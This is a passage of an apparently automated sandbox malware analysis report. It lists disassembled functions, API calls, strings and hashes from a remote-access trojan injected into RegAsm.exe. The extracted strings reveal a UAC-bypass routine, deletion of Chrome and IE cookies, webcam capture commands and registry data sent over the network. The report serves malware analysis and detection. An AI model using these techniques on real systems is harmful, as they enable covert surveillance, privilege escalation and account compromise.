                          Download Yara Rule
                          APIs
                          • GetConsoleCP.KERNEL32 ref: 100094D4
                          • __fassign.LIBCMT ref: 1000954F
                          • __fassign.LIBCMT ref: 1000956A
                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 10009590
                          • WriteFile.KERNEL32(?,?,00000000,10009C07,00000000), ref: 100095AF
                          • WriteFile.KERNEL32(?,?,00000001,10009C07,00000000), ref: 100095E8
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                          • String ID:
                          • API String ID: 1324828854-0
                          • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                          • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                          • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                          • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60
                          Function 0044B43C Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetConsoleCP.KERNEL32 ref: 0044B47E
                          • __fassign.LIBCMT ref: 0044B4F9
                          • __fassign.LIBCMT ref: 0044B514
                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B53A
                          • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BBB1,00000000), ref: 0044B559
                          • WriteFile.KERNEL32(?,?,00000001,0044BBB1,00000000), ref: 0044B592
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                          • String ID:
                          • API String ID: 1324828854-0
                          • Opcode ID: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                          • Instruction ID: 262f0c9efa3d8d05c94b564727faad167cb6e35c827a04fe4b8fb241bd644287
                          • Opcode Fuzzy Hash: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                          • Instruction Fuzzy Hash: 2151B470A00249AFDB10CFA8D845AEEFBF8EF09304F14456BE955E7291E734D941CBA9
                          Function 00413D48 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegOpenKeyExW.ADVAPI32 ref: 00413D81
                            • Part of subcall function 00413A90: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                            • Part of subcall function 00413A90: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413B26
                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                          • RegCloseKey.ADVAPI32(00000000), ref: 00413EEF
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseEnumInfoOpenQuerysend
                          • String ID: xUG$NG$NG$TG
                          • API String ID: 3114080316-2811732169
                          • Opcode ID: b671a3d148dc4dad6e50aea19cc29b45d172fff4de9eef1f9094f07207dc39cd
                          • Instruction ID: 39136fa66a1b3d14a29046baa0c8a2124f92290552efa608aac098e6c3039c27
                          • Opcode Fuzzy Hash: b671a3d148dc4dad6e50aea19cc29b45d172fff4de9eef1f9094f07207dc39cd
                          • Instruction Fuzzy Hash: 03419F316042005AC324F726D852AEF76A99FD1384F40883FF549671D2EF7C5949866E
                          Function 10003370 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                          Download Yara Rule
                          APIs
                          • _ValidateLocalCookies.LIBCMT ref: 1000339B
                          • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                          • _ValidateLocalCookies.LIBCMT ref: 10003431
                          • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                          • _ValidateLocalCookies.LIBCMT ref: 100034B1
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                          • String ID: csm
                          • API String ID: 1170836740-1018135373
                          • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                          • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                          • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                          • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91
                          Function 0041B71B Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 91COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00413656: RegOpenKeyExW.ADVAPI32 ref: 00413678
                            • Part of subcall function 00413656: RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                            • Part of subcall function 00413656: RegCloseKey.ADVAPI32(?), ref: 004136A0
                            • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                            • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                          • _wcslen.LIBCMT ref: 0041B7F4
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                          • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                          • API String ID: 3286818993-122982132
                          • Opcode ID: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                          • Instruction ID: 00334f857bbe6022557327a28fa8f115e820bd32ca6b34e50ab8c41aa79dd428
                          • Opcode Fuzzy Hash: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                          • Instruction Fuzzy Hash: 42218872A001046BDB14BAB59CD6AFE766D9B48728F10043FF505B72C3EE3C9D49426D
                          Function 0040BF24 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                            • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32 ref: 00413622
                            • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                          • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BFA6
                          • PathFileExistsA.SHLWAPI(?), ref: 0040BFB3
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                          • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                          • API String ID: 1133728706-4073444585
                          • Opcode ID: c07787becfdd919c069db1a68e32e5c9d5958318cedaa5e6beefbf099ad8eae3
                          • Instruction ID: a06d8339010b4a31413dea3cf8b7af81beee50618fccc2c871009a62ab4f9f33
                          • Opcode Fuzzy Hash: c07787becfdd919c069db1a68e32e5c9d5958318cedaa5e6beefbf099ad8eae3
                          • Instruction Fuzzy Hash: BC215230A40219A6CB14F7F1CC969EE77299F50744F80017FE502B71D1EB7D6945C6DA
                          Function 00456BD3 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4464324db8c5353dfe5ce51150f621231adbafcb5ed67c6bb2f14fac2072150c
                          • Instruction ID: d4e598e7927038c57750db0ba161657e9615562456f8c919f0676739ef068bdb
                          • Opcode Fuzzy Hash: 4464324db8c5353dfe5ce51150f621231adbafcb5ed67c6bb2f14fac2072150c
                          • Instruction Fuzzy Hash: 931127B2504214BBEB216F768C05D1F7A5CEB86726B52062EFD55C7292DA3CCC0186A8
                          Function 0041C482 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67fileCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C4DE
                          • CloseHandle.KERNEL32(00000000), ref: 0041C4EA
                          • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C4FB
                          • CloseHandle.KERNEL32(00000000), ref: 0041C508
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseHandle$CreatePointerWrite
                          • String ID: xpF
                          • API String ID: 1852769593-354647465
                          • Opcode ID: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                          • Instruction ID: 0233a984b642d2e84dd4fc2cab076f06cd7f632185dc4648213adf39284592b7
                          • Opcode Fuzzy Hash: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                          • Instruction Fuzzy Hash: 6311E571288215BFE7104A24ACC8EBB739CEB46365F10862BF912D22D0C624DC418639
                          Function 1000925D Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                            • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                          • _free.LIBCMT ref: 100092AB
                            • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                            • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                          • _free.LIBCMT ref: 100092B6
                          • _free.LIBCMT ref: 100092C1
                          • _free.LIBCMT ref: 10009315
                          • _free.LIBCMT ref: 10009320
                          • _free.LIBCMT ref: 1000932B
                          • _free.LIBCMT ref: 10009336
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                          • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                          • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                          • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751
                          Function 00450F7A Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00450CC1: _free.LIBCMT ref: 00450CEA
                          • _free.LIBCMT ref: 00450FC8
                            • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                          • _free.LIBCMT ref: 00450FD3
                          • _free.LIBCMT ref: 00450FDE
                          • _free.LIBCMT ref: 00451032
                          • _free.LIBCMT ref: 0045103D
                          • _free.LIBCMT ref: 00451048
                          • _free.LIBCMT ref: 00451053
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                          • Instruction ID: 345e916fd15b447c36d88a7a8914fd19e4c3e0710e9d23c2e9f19f8556552687
                          • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                          • Instruction Fuzzy Hash: C111D231402704AAE621BB72CC03FCB779CAF03304F454D2EBEA967153C7ACB4185654
                          Function 0041119E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                          Download Yara Rule
                          APIs
                          • std::_Lockit::_Lockit.LIBCPMT ref: 004111AB
                          • int.LIBCPMT ref: 004111BE
                            • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                            • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                          • std::_Facet_Register.LIBCPMT ref: 004111FE
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00411207
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00411225
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                          • String ID: (mG
                          • API String ID: 2536120697-4059303827
                          • Opcode ID: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                          • Instruction ID: b4facbf35e110c19f3eede998f69f9310dce987b63f856d60fe44c7d5fb17b17
                          • Opcode Fuzzy Hash: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                          • Instruction Fuzzy Hash: 42112732900114A7CB14EB9AD8018DEB7699F44364F11456FF904F72E1DB789E45CBC8
                          Function 0043A3DA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetLastError.KERNEL32(?,?,0043A3D1,0043933E), ref: 0043A3E8
                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A3F6
                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40F
                          • SetLastError.KERNEL32(00000000,?,0043A3D1,0043933E), ref: 0043A461
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLastValue___vcrt_
                          • String ID:
                          • API String ID: 3852720340-0
                          • Opcode ID: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                          • Instruction ID: 228fd8bb196f6ae1284969ba5442ea73dc67404c1df350b3d70410c0baad6fb0
                          • Opcode Fuzzy Hash: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                          • Instruction Fuzzy Hash: 87019C322483515EA61027797C8A62B2648EB293B9F30523FF518805F1EF984C90910D
                          Function 004075EB Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                          Download Yara Rule
                          APIs
                          • CoInitializeEx.OLE32(00000000,00000002), ref: 0040760B
                            • Part of subcall function 00407538: _wcslen.LIBCMT ref: 0040755C
                            • Part of subcall function 00407538: CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                          • CoUninitialize.OLE32 ref: 00407664
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: InitializeObjectUninitialize_wcslen
                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                          • API String ID: 3851391207-1839356972
                          • Opcode ID: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                          • Instruction ID: e4e7d1672fbddd81374e29e92f863be8f9bad83f72bb7a306ddb251afa86686e
                          • Opcode Fuzzy Hash: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                          • Instruction Fuzzy Hash: 4501D272B087116BE2246B65DC4AF6B3748DB41B25F11053FF901A62C1EAB9FC0146AB
                          Function 0040BADC Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                          Download Yara Rule
                          APIs
                          • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BB18
                          • GetLastError.KERNEL32 ref: 0040BB22
                          Strings
                          • [Chrome Cookies not found], xrefs: 0040BB3C
                          • [Chrome Cookies found, cleared!], xrefs: 0040BB48
                          • UserProfile, xrefs: 0040BAE8
                          • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAE3
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: DeleteErrorFileLast
                          • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                          • API String ID: 2018770650-304995407
                          • Opcode ID: e57bb7af6ede7258cae938a4b9e303b9ad2d55d8c8bd3889b57b796562934694
                          • Instruction ID: 5dee569c6883bfd73109a670bb68234af0f28e4caad238985ba957b2c74b96e7
                          • Opcode Fuzzy Hash: e57bb7af6ede7258cae938a4b9e303b9ad2d55d8c8bd3889b57b796562934694
                          • Instruction Fuzzy Hash: 5B01DF71A402055BCA04B7B6CC1B9BE7B24E922704B50017FF502726D6FE3E5D0986CE
                          Function 0040729B Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 40COMMON
                          Download Yara Rule
                          Strings
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 004076FF
                          • Rmc-7B1J99, xrefs: 00407715
                          • `.|, xrefs: 004076DF
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Rmc-7B1J99$`.|
                          • API String ID: 0-1037171124
                          • Opcode ID: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
                          • Instruction ID: 5ffff352cfcc2e87221e4fa572a01d73507d198e899e6baa5594ec663d9dd15d
                          • Opcode Fuzzy Hash: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
                          • Instruction Fuzzy Hash: 8DF02BB0E04600EBCB1477345D296AA3656A780397F40487BF507EB2F2EBBD5C41871E
                          Function 0043AB5C Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                          Download Yara Rule
                          APIs
                          • __allrem.LIBCMT ref: 0043ACE9
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD05
                          • __allrem.LIBCMT ref: 0043AD1C
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD3A
                          • __allrem.LIBCMT ref: 0043AD51
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD6F
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                          • String ID:
                          • API String ID: 1992179935-0
                          • Opcode ID: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                          • Instruction ID: c7cd181284538591ee8af1586cca3d38175ba7b34bac8e5aa56d350f01832762
                          • Opcode Fuzzy Hash: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                          • Instruction Fuzzy Hash: 5F815972A40B05ABE7209F29CC41B6FB3A99F48324F24152FF591D67C1E77CE910875A
                          Function 00404371 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 206sleepCOMMON
                          Download Yara Rule
                          APIs
                          • Sleep.KERNEL32(00000000,0040D29D), ref: 004044C4
                            • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: H_prologSleep
                          • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                          • API String ID: 3469354165-3054508432
                          • Opcode ID: 4647b3a2d276aae203f7a96e08ca0eaa792698452bb0acf0d7caf0005d5321f1
                          • Instruction ID: df1e58e957a7578ae16e417911435538e3341edc64810737793f4aa4f8849b6c
                          • Opcode Fuzzy Hash: 4647b3a2d276aae203f7a96e08ca0eaa792698452bb0acf0d7caf0005d5321f1
                          • Instruction Fuzzy Hash: A751E171A042106BCA14FB369D0A66E3755ABC4748F00443FFA0A676E2DF7D8E45839E
                          Function 0044597A Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: __cftoe
                          • String ID:
                          • API String ID: 4189289331-0
                          • Opcode ID: df708042516445aa89903c6330052172adb2df4233c064de01baf1be20d0a2ef
                          • Instruction ID: b93b8478136607885b926496a305f1bfb884a7f6acf724e610c81469f19cb9e5
                          • Opcode Fuzzy Hash: df708042516445aa89903c6330052172adb2df4233c064de01baf1be20d0a2ef
                          • Instruction Fuzzy Hash: 2551FD72500605ABFF209B598C81EAF77A8EF45334F25421FF915A6293DB3DD900C66D
                          Function 100015DA Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON
                          Download Yara Rule
                          APIs
                          • _strlen.LIBCMT ref: 10001607
                          • _strcat.LIBCMT ref: 1000161D
                          • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                          • lstrcatW.KERNEL32(?,?), ref: 1000165A
                          • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                          • lstrcatW.KERNEL32(00001008,?), ref: 10001686
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: lstrcatlstrlen$_strcat_strlen
                          • String ID:
                          • API String ID: 1922816806-0
                          • Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
